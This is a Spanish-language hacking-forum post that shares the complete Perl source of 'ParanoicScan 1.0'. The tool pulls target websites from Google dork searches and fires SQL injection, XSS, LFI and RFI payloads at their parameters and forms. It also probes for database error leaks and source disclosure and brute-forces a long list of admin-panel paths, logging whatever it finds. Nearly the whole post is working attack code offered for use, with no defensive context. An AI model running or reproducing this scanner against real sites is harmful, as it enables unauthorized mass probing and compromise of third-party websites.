elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Perl] ParanoicScan 1.0		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Perl] ParanoicScan 1.0  (Leído 2,048 veces)
BigBear


Desconectado Desconectado

Mensajes: 545



Ver Perfil
[Perl] ParanoicScan 1.0
« en: 3 Diciembre 2011, 16:32 pm »
Lo mismo que la anterior version solo se le agrego
un buscado de paneladmin y una nueva opcion para buscar listado de directorios en las paginas que estamos escaneando

Código
  1. #!usr/bin/perl
  2. #Paranoic Scan 1.0 Updated
  3. #(c)0ded by Doddy H 2011
  4. #
  5. #Search in google with a dork
  6. #Scan type :
  7. #
  8. #XSS
  9. #Full Source Discloure
  10. #LFI
  11. #RFI
  12. #SQL GET & POST + admin
  13. #Directory listing
  14. #MSSQL
  15. #Oracle
  16. #Jet Database
  17. #Find HTTP Options y Server nAME
  18. #
  19. #
  20.  
  21. use LWP::UserAgent;
  22. use HTML::LinkExtor;
  23. use HTML::Form;
  24. use URI::Split qw(uri_split);
  25. use IO::Socket;
  26.  
  27.  
  28. my @panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx'
  29. ,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx'
  30. ,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx'
  31. ,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx'
  32. ,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx'
  33. ,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx'
  34. ,'administracion/index.asp','administracion/index.aspx','administracion/login.asp'
  35. ,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx'
  36. ,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php'
  37. ,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php'
  38. ,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php'
  39. ,'administracion/login.php','administracion/ingresar.php','administracion/admin.php'
  40. ,'administration/','administration/index.php','administration/login.php'
  41. ,'administrator/index.php','administrator/login.php','administrator/system.php','system/'
  42. ,'system/login.php','admin.php','login.php','administrador.php','administration.php'
  43. ,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php'
  44. ,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html'
  45. ,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html'
  46. ,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html'
  47. ,'administrator/','administrator/index.html','administrator/login.html'
  48. ,'administrator/account.html','administrator/account.php','administrator.html','login.html'
  49. ,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php'
  50. ,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/'
  51. ,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html'
  52. ,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp'
  53. ,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp'
  54. ,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp'
  55. ,'administrator/login.asp','administrator/account.asp','administrator.asp'
  56. ,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp'
  57. ,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/'
  58. ,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php'
  59. ,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp'
  60. ,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html'
  61. ,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html'
  62. ,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp'
  63. ,'webadmin.html','administratie/','admins/','admins.php','admins.asp'
  64. ,'admins.html','administrivia/','Database_Administration/','WebAdmin/'
  65. ,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/'
  66. ,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/'
  67. ,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/'
  68. ,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/
  69. ','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/
  70. ','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/
  71. ','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/
  72. ','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/'
  73. ,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/'
  74. ,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/'
  75. ,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/'
  76. ,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/'
  77. ,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/'
  78. ,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/'
  79. ,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/'
  80. ,'server/','database_administration/','power_user/','system_administration/'
  81. ,'ss_vms_admin_sm/');
  82.  
  83. my $nave = LWP::UserAgent->new;
  84. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  85. $nave->timeout(5);
  86.  
  87. installer();
  88.  
  89. sta();
  90.  
  91. sub sta {
  92. sub head {
  93. system 'cls';
  95.  
  96.  
  97. @@@@@   @   @@@@     @   @@  @@@  @@@   @@@  @@@@     @@@   @@@@    @   @@  @@@
  98.  @  @   @    @  @    @    @@  @  @   @   @  @   @    @  @  @   @    @    @@  @ 
  99.  @  @  @ @   @  @   @ @   @@  @ @     @  @ @         @    @        @ @   @@  @ 
  100.  @@@   @ @   @@@    @ @   @ @ @ @     @  @ @          @@  @        @ @   @ @ @ 
  101.  @    @@@@@  @ @   @@@@@  @ @ @ @     @  @ @            @ @       @@@@@  @ @ @ 
  102.  @    @   @  @  @  @   @  @  @@  @   @   @  @   @    @  @  @   @  @   @  @  @@ 
  103. @@@  @@@ @@@@@@  @@@@ @@@@@@  @   @@@   @@@  @@@     @@@    @@@  @@@ @@@@@@  @ 
  104.  
  105.  
  106.  
  107.  
  108. );
  109. }
  110. &menu;
  111. sub menu {
  112. &head;
  113. print "[a] : Scan a File\n";
  114. print "[b] : Search in google and scan the webs\n\n";
  115. print "[option] : ";
  116. chomp(my $op = <STDIN>);
  117. if ($op =~/a/ig) {
  118. print "\n[+] Wordlist : ";
  119. chomp(my $word = <STDIN>);
  120. my @paginas = repes(cortar(savewords($word)));
  121. my $option = &men;
  122. print "\n\n[+] Opening File\n";
  123. scan($option,@paginas);
  124. } 
  125. elsif ($op=~/b/ig) {
  126. print "\n[+] Dork : ";
  127. chomp(my $dork = <STDIN>);
  128. print "[+] Pages : ";
  129. chomp(my $pag = <STDIN>);
  130. my $option = &men;
  131. print "\n\n[+] Searching in google\n";
  132. my @paginas = &google($dork,$pag);	
  133. scan($option,@paginas);
  134. }
  135. else {
  136. &menu;
  137. }
  138. }
  139. sub scan {
  140. my ($option,@webs) = @_;
  141. print "\n\n[Status] : Scanning\n";
  142. print "[Webs Count] : ".int(@webs)."\n\n";
  143. for(@webs) {
  144. if ($option=~/S/ig) {
  145. scansql($_);
  146. } 
  147. if ($option=~/K/ig) {
  148. sql($_);
  149. } 
  150. if ($option=~/Q/ig) {
  151. sqladmin($_);
  152. } 
  153. if ($option=~/Y/ig) {
  154. simple($_);
  155. } 
  156. if ($option=~/L/ig) {
  157. lfi($_);
  158. }
  159. if ($option=~/R/ig) {
  160. rfi($_);
  161. }
  162. if ($option=~/F/ig) {
  163. fsd($_);
  164. }
  165. if ($option=~/X/ig) {
  166. scanxss($_);
  167. }
  168. if ($option=~/M/ig) {
  169. mssql($_);
  170. }
  171. if ($option=~/J/ig) {
  172. access($_);
  173. }
  174. if ($option=~/O/ig) {
  175. oracle($_);
  176. }
  177. if ($option=~/HT/ig) {
  178. http($_);
  179. }
  180. if ($option=~/A/ig) {
  181. scansql($_);
  182. scanxss($_);
  183. mssql($_);
  184. access($_);
  185. oracle($_);
  186. lfi($_);
  187. rfi($_);
  188. fsd($_);
  189. http($_);
  190. }
  191. }
  192. }
  193. print "\n\n[Status] : Finish\n";
  194. &finish;
  195. }
  196.  
  197. sub toma {
  198. return $nave->get($_[0])->content;
  199. }
  200.  
  201. sub tomaz {
  202. return $nave->get($_[0]);
  203. }
  204.  
  205. sub savefile {
  206. open(SAVE,">>logs/".$_[0]);
  207. print SAVE $_[1]."\n";
  208. close SAVE; 
  209. }
  210.  
  211. sub finish {
  212. print "\n\n\n(C) Doddy Hackman 2010\n\n";
  213. <STDIN>;
  214. sta();
  215. }
  216.  
  217. sub google {
  218. my($a,$b) = @_;
  219. for ($pages=10;$pages<=$b;$pages=$pages+10) {
  220. $code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
  221. my @links = get_links($code);
  222. for my $l(@links) {
  223. if ($l =~/webcache.googleusercontent.com/) {
  224. push(@url,$l);
  225. }
  226. }
  227. }
  228.  
  229. for(@url) {
  230. if ($_ =~/cache:(.*?):(.*?)\+/) {
  231. push(@founds,$2);
  232. }
  233. }
  234.  
  235. my @founds = repes(cortar(@founds));
  236. return @founds; 
  237. }
  238.  
  239. sub sql {
  240. my ($pass1,$pass2) = ("+","--");
  241. my $page = shift;
  242. $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
  243. if ($code1=~/The used SELECT statements have a different number of columns/ig) {
  244. print "[+] SQLI : $page\a\n";
  245. savefile("sql-logs.txt",$page);
  246. }}
  247.  
  248. sub sqladmin {
  249. my ($pass1,$pass2) = ("+","--");
  250. my $page = shift;
  251. $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
  252. if ($code1=~/The used SELECT statements have a different number of columns/ig) {
  253. print "\n[+] SQLI : $page\a\n";
  254. savefile("sql-logs.txt",$page);
  255.  
  256. my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
  257.  
  258. my $fage = "http://".$auth;
  259.  
  260. for $path(@panels) {
  261. $code = tomaz($fage."/".$path);
  262. if ($code->is_success) {
  263. print "[+] Link : ".$fage."/".$path."\n";
  264. savefile("admin-logs.txt",$fage."/".$path);
  265. }}}}
  266.  
  267. sub http {
  268.  
  269. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  270.  
  271. my $socket = IO::Socket::INET->new(
  272. PeerAddr=>$auth, 
  273. PeerPort=>"80", 
  274. Proto=>"tcp"); 
  275.  
  276. print $socket "OPTIONS  / HTTP/1.0\r\n\r\n";
  277. read $socket,$resultado,"1000";	
  278.  
  279. if ($resultado=~/Server:(.*)/g) {
  280. my $server = $1;
  281.  
  282. savefile("http-logs.txt","[+] Page : $auth"."\n");
  283. savefile("http-logs.txt","[+] Server : ".$server."\n");
  284. }
  285. if ($resultado=~/Allow: (.*)/g) {
  286. my $options = $1;
  287. savefile("http-logs.txt","[+] Options : ".$options."\n");
  288. }
  289. $socket->close;
  290. }
  291.  
  292. sub scanxss { 
  293.  
  294. my $page = shift;
  295. chomp $page;
  296.  
  297. my @testar = HTML::Form->parse(toma($page),"/");
  298. my @botones_names;
  299. my @botones_values;
  300. my @orden;
  301. my @pa = ("<script>alert(String.fromCharCode(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111))</script>",'"><script>alert(String.fromCharCode(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111))</script>');
  302. my @get_founds;
  303. my @post_founds;
  304. my @ordenuno;
  305. my @ordendos;
  306.  
  307. my $contador_forms = 0;
  308.  
  309. my $valor = "doddyhackman";
  310.  
  311. for my $test(@testar) {
  312. $contador_forms++;
  313. if ($test->method eq "POST") {
  314. my @inputs = $test->inputs;
  315. for my $in(@inputs) {
  316. if ($in->type eq "submit") { 
  317. if ($in->name eq "") {
  318. push(@botones_names,"submit");
  319. }
  320. push(@botones_names,$in->name);
  321. push(@botones_values,$in->value);
  322. } else {
  323. push(@ordenuno,$in->name,$pa[0]);
  324. push(@ordendos,$in->name,$pa[1]);
  325. }}
  326.  
  327. for my $n(0..int(@botones_names)-1) {
  328. my @preuno = @ordenuno;
  329. my @predos = @ordendos;
  330. push(@preuno,$botones_names[$n],$botones_values[$n]);
  331. push(@predos,$botones_names[$n],$botones_values[$n]);
  332.  
  333. my $codeuno = $nave->post($page,\@preuno)->content;
  334. my $codedos = $nave->post($page,\@predos)->content;
  335. if ($codeuno=~/<script>alert\(String.fromCharCode\(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111\)\)<\/script>/ig or 
  336. $codedos=~/<script>alert\(String.fromCharCode\(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111\)\)<\/script>/ig) {
  337. if ($test->attr(name) eq "" or $test->attr(name) eq " ") {
  338. push(@post_founds,$contador_forms);
  339. } else {
  340. push(@post_founds,$test->attr(name));
  341. }}}
  342. } else { #Fin de metodo POST
  343. my @inputs = $test->inputs;
  344. for my $in(@inputs) {	
  345. if ($in->type eq "submit") { 
  346. if ($in->name eq "") {
  347. push(@botones_names,"submit");
  348. }
  349. push(@botones_names,$in->name);
  350. push(@botones_values,$in->value);
  351. } else {
  352. $orden.=''.$in->name.'='.$valor.'&';
  353. }}
  354. chop($orden);
  355. for my $n(0..int(@botones_names)-1) {
  356. my $partedos = "&".$botones_names[$n]."=".$botones_values[$n];
  357. my $final = $orden.$partedos;
  358. for my $strin(@pa) {
  359. chomp $strin;
  360. $final=~s/doddyhackman/$strin/;
  361. $code = toma($page."?".$final);
  362. my $strin = "\Q$strin\E";
  363. if ($code=~/$strin/) {
  364. push(@get_founds,$page."?".$final);
  365. }}}}} 
  366.  
  367. my @get_founds = repes(@get_founds);
  368. if (int(@get_founds) ne 0) {
  369. for(@get_founds) {
  370. savefile("xss-logs.txt","[+] XSS Found : $_");
  371. print "[+] XSS Found : $_\n\a";
  372. }}
  373.  
  374. my @post_founds = repes(@post_founds);
  375. if (int(@post_founds) ne 0) {
  376. for my $t(@post_founds) {
  377. if ($t =~/^\d+$/) {
  378. savefile("xss-logs.txt","[+] XSS : Form $t in $page");
  379. print "[+] XSS : Form $t in $page\n\a";
  380. }}}} 
  381.  
  382.  
  383. sub simple {
  384.  
  385. my $code  = toma($_[0]);
  386. my @links = get_links($code);
  387.  
  388. for my $com (@links) {
  389. my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
  390. if ( $path =~ /\/(.*)$/ ) {
  391. my $path1 = $1;
  392. $_[0] =~ s/$path1//ig;
  393. my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com);
  394. if ( $path =~ /(.*)\// ) {
  395. my $parche = $1;                                 
  396. unless($repetidos=~/$parche/){
  397. $repetidos.=" ".$parche;
  398. my $code=toma("http://".$auth.$parche);     
  399. if ($code =~ /Index of (.*)</ig ) {
  400. my $dir_found = $1;
  401. chomp $dir_found;
  402. print "[+] Directory Found : "."http://".$auth.$parche."\n";
  403. savefile("dir-logs.txt","[+] Directory Found : "."http://".$auth.$parche);
  404. }}}}}}
  405.  
  406. sub scansql { 
  407.  
  408. my $page = shift;
  409. my $copia = $page;
  410.  
  411. $co = toma($page."'");
  412.  
  413. if ($co=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $co=~ /mysql_free_result/ig || $co =~ /mysql_fetch_assoc/ig ||$co =~ /mysql_num_rows/ig || $co =~ /mysql_fetch_array/ig || $co =~/mysql_fetch_assoc/ig || $co=~/mysql_query/ig || $co=~/mysql_free_result/ig || $co=~/equivocado en su sintax/ig || $co=~/You have an error in your SQL syntax/ig || $co=~/Call to undefined function/ig) {
  414. savefile("sql-logs.txt","[+] SQL : $page");
  415. print "[+] SQLI : $page\a\n"; 
  416. } else {
  417.  
  418. if ($page=~/(.*)\?(.*)/) {
  419. my $page = $1;
  420.  
  421. my @testar = HTML::Form->parse(toma($page),"/");
  422. my @botones_names;
  423. my @botones_values;
  424. my @orden;
  425. my @get_founds;
  426. my @post_founds;
  427. my @ordenuno;
  428. my @ordendos;
  429.  
  430. my $contador_forms = 0;
  431.  
  432. my $valor = "doddyhackman";
  433.  
  434. for my $test(@testar) {
  435. $contador_forms++;
  436. if ($test->method eq "POST") {
  437. my @inputs = $test->inputs;
  438. for my $in(@inputs) {
  439. if ($in->type eq "submit") { 
  440. if ($in->name eq "") {
  441. push(@botones_names,"submit");
  442. }
  443. push(@botones_names,$in->name);
  444. push(@botones_values,$in->value);
  445. } else {
  446. push(@ordenuno,$in->name,"'");
  447. }}
  448.  
  449. for my $n(0..int(@botones_names)-1) {
  450. my @preuno = @ordenuno;
  451. push(@preuno,$botones_names[$n],$botones_values[$n]);
  452. my $code = $nave->post($page,\@preuno)->content;
  453. if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {
  454. if ($test->attr(name) eq "" or $test->attr(name) eq " ") {
  455. push(@post_founds,$contador_forms);
  456. } else {
  457. push(@post_founds,$test->attr(name));
  458. }}}}
  459.  
  460. my @post_founds = repes(@post_founds);
  461. if (int(@post_founds) ne 0) {
  462. for my $t(@post_founds) {
  463. if ($t =~/^\d+$/) {
  464. savefile("sql-logs.txt","[+] SQLI : Form $t in $page");
  465. print "[+] SQLI : Form $t in $page\n\a";
  466. }}}}}}}
  467.  
  468. sub access {
  469.  
  470. my $page = shift;
  471. $code1 = toma($page."'");
  472. if ($code1=~/Microsoft JET Database/ig or $code1=~/ODBC Microsoft Access Driver/ig) {
  473. print "[+] Jet DB : $page\a\n";
  474. savefile("jetdb-logs.txt",$page);
  475. }
  476. }
  477.  
  478. sub mssql {
  479.  
  480. my $page = shift;
  481. $code1 = toma($page."'");
  482. if ($code1=~/ODBC SQL Server Driver/ig) {
  483. print "[+] MSSQL : $page\a\n";
  484. savefile("mssql-logs.txt",$page);
  485. }
  486. }
  487.  
  488. sub oracle {
  489.  
  490. my $page = shift;
  491. $code1 = toma($page."'");
  492. if ($code1=~/Microsoft OLE DB Provider for Oracle/ig) {
  493. print "[+] Oracle : $page\a\n";
  494. savefile("oracle-logs.txt",$page);
  495. }
  496. }
  497.  
  498. sub rfi {
  499. my $page = shift;
  500. $code1 = toma($page."http:/www.supertangas.com/");
  501. if ($code1=~/Los mejores TANGAS de la red/ig) { #Esto es conocimiento de verdad xDDD
  502. print "[+] RFI : $page\a\n";
  503. savefile("rfi-logs.txt",$page);
  504. }}
  505.  
  506. sub lfi {
  507. my $page = shift;
  508. $code1 = toma($page."'");
  509. if ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
  510. print "[+] LFI : $page\a\n";
  511. savefile("lfi-logs.txt",$page);
  512. }}
  513.  
  514. sub fsd {
  515. my $page = shift;
  516. my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
  517. if ($path=~/\/(.*)$/) { 
  518. my $me = $1;
  519. $code1 = toma($page.$me);
  520. if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {
  521. print "[+] Full Source Discloure : $page\a\n";
  522. savefile("fpd-logs.txt",$page);
  523. }}}
  524.  
  525. sub repes {
  526. my @limpio;
  527. foreach $test(@_) {
  528. push @limpio,$test unless $repe{$test}++;
  529. }
  530. return @limpio;
  531. }
  532.  
  533. sub savewords {
  534. open(FILE,$_[0]);
  535. @words = <FILE>;
  536. close FILE;
  537. for(@words) {
  538. push(@r,$_);
  539. } 	
  540. return(@r);
  541. } 
  542.  
  543. sub men {
  544. print "\n\n[+] Scan Type : \n\n";
  545. print "[X] : XSS\n";
  546. print "[S] : SQL GET/POST\n";#
  547. print "[K] : SQL GET\n";
  548. print "[Q] : SQL GET + Admin\n";
  549. print "[Y] : Directory listing\n";#
  550. print "[M] : MSSQL\n";
  551. print "[J] : Jet Database\n";
  552. print "[O] : Oracle\n";
  553. print "[L] : LFI\n";
  554. print "[R] : RFI\n";
  555. print "[F] : Full Source Discloure\n";
  556. print "[HT] : HTTP Information\n";
  557. print "[A] : All\n\n";
  558. print "\n[Options] : ";
  559. chomp(my $option = <STDIN>);
  560. return $option;
  561. }
  562.  
  563. sub cortar {
  564. my @nuevo;
  565. for(@_) {
  566. if ($_ =~/=/) {
  567. @tengo = split("=",$_);
  568. push(@nuevo,@tengo[0]."=");
  569. } else {
  570. push(@nuevo,$_);
  571. }}
  572. return @nuevo;
  573. }
  574.  
  575. sub get_links {
  576.  
  577. $test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
  578. return @links;
  579.  
  580. sub agarrar {
  581. my ($a,%b) = @_;
  582. push(@links,values %b); 
  583. }
  584. }
  585.  
  586.  
  587. sub installer {
  588. unless (-d "logs/") {
  589. mkdir("logs/","777");
  590. }
  591. }
  592.  
  593. # ¿ The End ? 
  594.  
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Libros de Perl online [PERL]
Scripting 		madpitbull_99 0 3,841 Último mensaje 18 Mayo 2011, 21:49 pm
por madpitbull_99
[Perl] Project ParanoicScan 1.0
Scripting 		BigBear 0 1,532 Último mensaje 4 Agosto 2012, 16:02 pm
por BigBear
[Perl] Project ParanoicScan 1.7
Scripting 		BigBear 0 1,938 Último mensaje 1 Enero 2014, 04:56 am
por BigBear
[Python-Android] ParanoicScan 0.3
Scripting 		BigBear 1 2,268 Último mensaje 10 Febrero 2014, 15:32 pm
por adastra
[Python-Android] ParanoicScan 0.4
Scripting 		BigBear 0 1,523 Último mensaje 6 Noviembre 2015, 21:08 pm
por BigBear
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines